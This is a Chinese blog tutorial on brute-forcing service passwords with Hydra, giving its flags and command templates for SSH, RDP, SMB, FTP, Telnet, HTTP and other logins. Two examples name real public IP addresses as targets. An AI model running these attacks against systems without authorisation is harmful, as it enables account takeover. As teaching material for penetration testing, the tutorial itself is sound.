HYDRA 账号密码爆破

已于 2023-04-13 20:28:53 修改
阅读量979 收藏 3
点赞数 1
分类专栏: web渗透工具 文章标签: 网络安全 服务器
于 2023-04-13 20:28:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackguest07/article/details/130139403
版权

个人博客:www.ytongsai.cn

作者:凌度

time:2023/04/13

1. Hydra 简介:

hydra 是一个自动化的爆破工具,暴力破解弱密码,它支持的协议非常多

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

2. Hydra 基于 kali:

1. github 项目地址:

https://github.com/vanhauser-thc/thc-hydra

由于我们的 kail 自带 Hydra,因此我这里安装省略了,还有一点是,我真的不会安装。。。这个软件在 windows 上。

2. Hydra 常用命令参数:

-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M 参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为 16。
-w TIME 设置最大超时的时间,单位秒,默认是 30s。
-v / -V 显示详细过程。
server 目标 ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-
ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy 
cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener 
postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq 
sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd 
firebird ncp afp 等等。
hydra -l root -P UserPassCombo-Jay.txt -t 5 -vV 47.110.73.12 ssh 
-f 
hydra -l administrator -P UserPassCombo-Jay.txt -t 5 -vV 
47.99.218.105 rdp -f

3. Hydra 爆破案例:

我们以 ssh 服务作为案例:

我们在 kali 当中输入如何如下命令即可对目标的 ip 实现 ssh 爆破

-l 指定用户名,然后用 -P (注意这里是大写)指定我们的字典,通过 -v 显示输出的信息,通过 -f 在我们爆破成功的时候停止爆破,前面都是填写参数,最后两个位置填写的是我们目标的 ip 和 服务。

hydra -l ubuntu -P /force_dictionary/Fuzzing-Dicts-master/Password-Top1000(1010).txt -t 4 -v -f ip ssh

4. Hydra 爆破不同协议的密码:

​#破解ssh:        hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
#破解https:     hydra -m /index.php -l username -P pass.txt IP https
#破解teamspeak: hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
#破解cisco:     hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt 127.0.0.1 cisco-enable
#破解smb:       hydra -l administrator -P pass.txt IP smb
#破解pop3:      hydra -l muts -P pass.txt my.pop3.mail pop3
#破解rdp:       hydra IP rdp -l administrator -P pass.txt -V          
#破解http-proxy: hydra -l admin -P pass.txt http-proxy://127.0.0.1  
#破解telnet:     hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
#破解ftp:       hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
#get方式提交,破解web登录: 
hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php

ldsecurity
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Hydra密码爆破工具使用教程图文教程(超详细)
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
hydra强大的爆破工具,支持多种协议
05-05
hydra支持POP3,SMB,RDP、SSH,FTP,POP3,Telnet,MYSQL等协议的爆破
应用协议安全:Hydra 端口爆破工具.(九头蛇)
最新发布
m0_59598029的博客
05-17 1123
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
python3爆力破解rtsp脚本
weixin_30273763的博客
05-25 173
一、说明 hydra是说已实现了rtsp的爆力破解,但是使用时发现字典中明明已包含正确的用户名密码hydra却还没检测出来; 拦截数据包查看,感觉hydra只是尝试去匿名访问,并没有发送用户名密码去验证,所以自己写了个脚本。 二、脚本代码 rtsp有Basic和Digest两种验证方式,这里默认使用‘Basic’,如果想用‘Digest’方式将代码中的config_dict...
003--横向渗透的常见方法
weixin_44508748的博客
07-22 2947
在已经攻占部分内网主机的前提下,利用现有的资源尝试获取更多的凭据、更高的权限,进而达到控制整个网段、拥有最高权限的目的。在很多时候,内网渗透的起点往往只是一台通过各种漏洞漏洞攻陷的跳板,通过这个突破口去不断扩大在本网段内的战果,是为横向渗透。 一、系统漏洞 0day 二、流量监听 三、ARP欺骗 四、服务密码攻击 ...
常见协议爆破—ssh、rdp、smtp、pop3、imap等
qq_43058348的博客
04-27 3132
环境 kali- - - - 任意PC 常用爆破工具 msf、hydra、medusa、patator等 rdp hydra -l username -p password rdp://ip python patator.py rdp_login host=10.10.70.4 user='admin' password = '1' #上面这个主意要先export DISPLAY=:0.0 ssh hydra -l username -p password ssh://ip medusa -u u
hydra使用教程
weixin_45778886的博客
03-14 3692
目录标题注意hydra详细使用教程hydra简介hydra常用命令hydra支持破解的服务/协议对应功能的参数模板1、破解ssh:2、破解ftp:3、get方式提交,破解web登录:4、post方式提交,破解web登录:5、破解https:6、破解teamspeak:7、破解cisco:8、破解smb:9、破解pop3:10、破解rdp:11、破解http-proxy:12、破解imap:实例演示-破解SSH密码1.使用字典对目标服务进行破解。2.当目标服务开放的端口不是默认端口时,使用 -s 进行指定。3
hydra密码爆破字典压缩后120M,password压缩前386M。
03-03
hydra密码爆破字典压缩后120M,压缩前386M。下的别人的,共享出来
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;...
hydra 暴力破解弱密码
06-02
hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具
hydra 爆破工具
02-22
windows 版 hydra 爆破工具,仅供学习。
【经验分享】Hydra(爆破神器)使用方法
weixin_33730836的博客
11-08 3736
这个也是backtrack下面很受欢迎的一个工具 参数详解:-R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(ns)-C 用户名可以用:分割(username:password)可以代替-l username -p password-o 输出文件-t 指定多...
RTSP存在弱口令
maverickpig的博客
01-14 2143
RTSP存在弱口令 RTSP协议 RTSP(Real-Time Stream Protocol)协议是一个基于文本的多媒体播放控制协议,属于应用层。RTSP以客户端方式工作,对流媒体提供播放、暂停、后退、前进等操作。该标准由IETF指定,对应的协议是RFC2326。 RTSP传输的一般是TS、MP4格式的流,其传输一般需要2~3个通道,命令和数据通道分离。使用RTSP协议传输流媒体数据需要有专门的媒体播放器和媒体服务器,也就是需要支持RTSP协议的客户端和服务器。 这里实用的RTSP客户端为VLC medi
安装MongoDB出现的问题
fake_hydra的博客
11-06 1089
问题一: -bash: ./mongod: /lib/ld-linux.so.2: bad ELF interpreter: 没有那个文件或目录 软件兼容性,64的的操作系统,选择的却是32位的软件安装包 解决: 重新下载一个64位的安装包 wget https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-rhel70-4.0.3.tg...
利用hydra做大保健(爆破各种服务大集合)
SoulCat
03-04 8571
利用hydra做大保健(爆破各种服务大集合) 我遇见你 在烟雾袅袅 在浮生清欢 简单万金油: Hydra –L 文件路径 –P 密码路径 t 线程 –vV 详细显示 –o 指定生成路径 –f 找到密码就停止 –e ns 空密码和指定密码试探 ip service 爆破服务 爆破ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用...
burp如何设置爆破的时候账号密码一致
Bul1et的博客
04-24 3936
平时在暴力破解的时候,总会遇到这样的问题。 比如一个登陆页面,我们知道账号密码相同,但是需要字典足够大才能爆破出来,这个时候我一般会选择这样做 选择两个变量 选择第四个爆破模块 添加同样的字典 top500 开始爆破 这个也能爆破但是 耗费的时间很多 就像我们前面说的 知道了账号密码的规则 是账号密码相同 我们这样做相当于循环了 太费时间 这里就有个好...
文章标题
Hq_Dream的博客
05-30 479
OutOfMemory.CN β 聚客代码专栏教程MavenGitter标签 登录注册 好书:重构 改善既有代码的设计[京东 亚马逊] | 敏捷软件开发原则、模式与实践[京东 亚马逊] | 代码大全(第二版)[京东 亚马逊] | 代码整洁之道[亚马逊] | 企业应用架构模式[京东 亚马逊] (总结)Linux下的暴力密码在线破解工具Hydra详解 服务器运维与网站架构|
rtsp 用户名、密码登录
热门推荐
yuanbinquan的专栏
02-24 2万+
在使用rtp看视频时,有时候需要使用用户名和密码登录,那么在用户名密码登录的流程是怎么样的呢? 大致流程:                    rtsp 客户端发送DESCRIBE指令                     服务器应答401错误,说明需要用户名密码认证                     rtsp 客户端再次发送DESCRIBE指令,该指令包含用户名密码等有效信息,
口令爆破 --Hydra
我不是大牛
07-09 4123
内容: 简介 查看帮助 参数说明 Hydra的使用—爆破FTP 服务 图形界面 破解3389 远程桌面连接 破解SSH 服务 Hydra—简介 • hydra著名黑客组织THC的一款开源的暴力破解工具。 • Hydra 支持多平台版本 • 对需要网络登录的系统进行快速的字典攻击—在线攻击。 • 支持大量的服务,包括FTP/POP3/IMAP/Telnet/SSH 等。 Hydra—查看帮助 命令 ...
hydra爆破mysql
04-27
Hydra是一款常用的密码爆破工具,可以用于测试系统的密码强度。它支持多种协议和服务,包括MySQL数据库。下面是使用Hydra进行MySQL爆破的一般步骤: 1. 安装Hydra:首先需要在你的系统上安装Hydra。你可以从Hydra的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ldsecurity

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值